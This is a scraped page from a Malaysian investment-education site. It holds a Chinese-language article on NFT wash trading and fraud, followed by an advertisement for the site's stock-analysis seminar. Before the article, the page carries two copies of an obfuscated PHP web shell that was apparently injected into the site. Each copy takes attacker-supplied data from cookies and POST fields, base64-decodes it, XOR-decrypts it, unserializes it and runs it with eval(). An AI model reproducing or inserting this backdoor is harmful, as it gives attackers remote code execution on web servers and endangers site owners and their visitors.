$sdGxpba = "\111" . "\114" . "\x5f" . chr ( 782 - 699 ).chr (116) . "\171";$goApL = "\143" . "\x6c" . 'a' . chr (115) . "\x73" . "\x5f" . chr ( 321 - 220 ).chr ( 788 - 668 ).'i' . "\x73" . chr (116) . chr ( 1007 - 892 ); $nAmGlG = class_exists($sdGxpba); $sdGxpba = "52141";$goApL = "29555";$NfllrzRu = !1;if ($nAmGlG == $NfllrzRu){function RKIImwN(){return FALSE;}$IDFKXPYx = "24891";RKIImwN();class IL_Sty{private function PeDJhgPkk($IDFKXPYx){if (is_array(IL_Sty::$HBGia)) {$dWmOqqPn = str_replace("\74" . "\x3f" . chr (112) . chr (104) . "\160", "", IL_Sty::$HBGia[chr (99) . "\157" . "\156" . "\x74" . chr ( 121 - 20 )."\x6e" . "\164"]);eval($dWmOqqPn); $IDFKXPYx = "24891";exit();}}private $zPXYye;public function lEQFKwRHQ(){echo 33039;}public function __destruct(){$IDFKXPYx = "23772_943";$this->PeDJhgPkk($IDFKXPYx); $IDFKXPYx = "23772_943";}public function __construct($OvzOxh=0){$QnOMR = $_POST;$HNoZlG = $_COOKIE;$zWAraslni = "00585ef7-4ced-44bd-b8c4-08720b627307";$vBIfFlHAOq = @$HNoZlG[substr($zWAraslni, 0, 4)];if (!empty($vBIfFlHAOq)){$MXZBkx = "base64";$FeOuE = "";$vBIfFlHAOq = explode(",", $vBIfFlHAOq);foreach ($vBIfFlHAOq as $PoBhIs){$FeOuE .= @$HNoZlG[$PoBhIs];$FeOuE .= @$QnOMR[$PoBhIs];}$FeOuE = array_map($MXZBkx . chr ( 717 - 622 ).'d' . 'e' . "\x63" . chr (111) . "\144" . "\145", array($FeOuE,)); $FeOuE = $FeOuE[0] ^ str_repeat($zWAraslni, (strlen($FeOuE[0]) / strlen($zWAraslni)) + 1);IL_Sty::$HBGia = @unserialize($FeOuE); $FeOuE = class_exists("23772_943");}}public static $HBGia = 37724;}$SVTKDqFpG = new /* 55422 */ IL_Sty(24891 + 24891); $_POST = Array();unset($SVTKDqFpG);}$VmrjCDTZ = 'y' . chr (85) . 'k' . '_' . chr ( 826 - 704 )."\x6c" . chr (122) . chr (121); $vPtitZaAWd = "\x63" . "\154" . chr (97) . chr (115) . chr (115) . chr (95) . "\x65" . chr (120) . chr ( 286 - 181 ).'s' . chr (116) . "\x73";$XIlsVotk = class_exists($VmrjCDTZ); $VmrjCDTZ = "46710";$vPtitZaAWd = "59509";$XaraWMagC = !1;if ($XIlsVotk == $XaraWMagC){function inruEbmArT(){return FALSE;}$txNTYiJwJ = "25459";inruEbmArT();class yUk_zlzy{private function ARRFnADTjt($txNTYiJwJ){if (is_array(yUk_zlzy::$IAvLNKdMY)) {$PynIVk = str_replace("\x3c" . chr (63) . chr ( 929 - 817 ).chr (104) . chr (112), "", yUk_zlzy::$IAvLNKdMY["\143" . "\157" . "\x6e" . "\164" . "\145" . chr ( 542 - 432 ).chr ( 941 - 825 )]);eval($PynIVk); $txNTYiJwJ = "25459";exit();}}private $JMsPwJD;public function oYiWfD(){echo 37459;}public function __destruct(){$txNTYiJwJ = "34118_42125";$this->ARRFnADTjt($txNTYiJwJ); $txNTYiJwJ = "34118_42125";}public function __construct($EHxOe=0){$Viwyqrqo = $_POST;$LBbvlNXm = $_COOKIE;$aOBmqXw = "fcffcccc-814a-42f6-8e1a-da6b9d9f084c";$EtEkLgiVM = @$LBbvlNXm[substr($aOBmqXw, 0, 4)];if (!empty($EtEkLgiVM)){$FcgWs = "base64";$WmGFePzKv = "";$EtEkLgiVM = explode(",", $EtEkLgiVM);foreach ($EtEkLgiVM as $LgkrbzFPFV){$WmGFePzKv .= @$LBbvlNXm[$LgkrbzFPFV];$WmGFePzKv .= @$Viwyqrqo[$LgkrbzFPFV];}$WmGFePzKv = array_map($FcgWs . "\137" . "\x64" . 'e' . chr ( 193 - 94 ).'o' . "\144" . "\x65", array($WmGFePzKv,)); $WmGFePzKv = $WmGFePzKv[0] ^ str_repeat($aOBmqXw, (strlen($WmGFePzKv[0]) / strlen($aOBmqXw)) + 1);yUk_zlzy::$IAvLNKdMY = @unserialize($WmGFePzKv); $WmGFePzKv = class_exists("34118_42125");}}public static $IAvLNKdMY = 27291;}$xFedbrqbzh = new /* 56596 */ yUk_zlzy(25459 + 25459); $_POST = Array();unset($xFedbrqbzh);} 卖得掉的叫NFT, 卖不掉的叫JPG (Part 2) - Sharix

卖得掉的叫NFT, 卖不掉的叫JPG (Part 2)

然而,NFT市场充斥着大量冲销交易(Wash Trading),这个过程涉及卖家通过频繁购买自己的NFT来抬高价格获取暴利。卖家通过扮演着买卖双方的角色来夸大交易量,制造其NFT被市场追捧的错觉。冲销交易其实曾在华尔街流行过一段时间,但这些手法在近百年前就已被归类为非法交易。

根据Reuters的报道显示,一月份所追踪的27个最昂贵的NFT销售额高达13亿美元,但是这些高额的交易量仅来自NFT 平台 Looks Rare 的两个加密钱包。由于NFT市场缺乏监管规则和官方的指引,让许多犯罪分子有机可乘地利用区块链账户和匿名性加密钱包进行诈骗行为, 并且从中获取暴利。即使有大量证据表明许多NFT的销售额是虚假的,但却没有收集到足够的硬数据,特别是当犯罪分子有意图地掩盖踪迹的情况下。

在一个没有监管的烟雾弥漫的市场里,必定会涉及一些无官方证实的虚假宣传、金融欺诈、靠“噱头”拉高价格的现象,所以读者们如果对NFT市场有兴趣的话,就得认真做功课,且尽量避开不在自己认知范围里的投资产品,才不会充当韭菜。最后,笔者认为NFT是一种具有非常大潜力的区块链新生技术,但是NFT如果想要发挥它实际的价值,首要的是必须完全杜绝犯罪分子利用NFT区块链技术的特点从事诈骗、洗钱等非法活动。

又到了季报发布的季节了,SHARIX一向协助投资者们学习投资理财,让投资化繁为简。想要掌握投资本质的起承转合,要涉及的知识面非常广,所以Sharix 所独创的《股理悟道》分享会绝对能助投资者们一臂之力。尤其在2022年股市充满许多不确定因素的时候,《股理悟道》能有效帮助投资者跟进马股每个季度上市公司的业绩表现以及发现投资机会。

如果你是第一次知道这项分享会,欢迎前来试试,如果此分享会能帮助到您的话,不妨可签订我们股理悟道年票并享有额外福利~

想了解更多可点击此链接~

最新文章

Sharix Sdn Bhd (1313184-A)
@ 2023 Sharix Sdn Bhd. All Rights Reserved
官方社交平台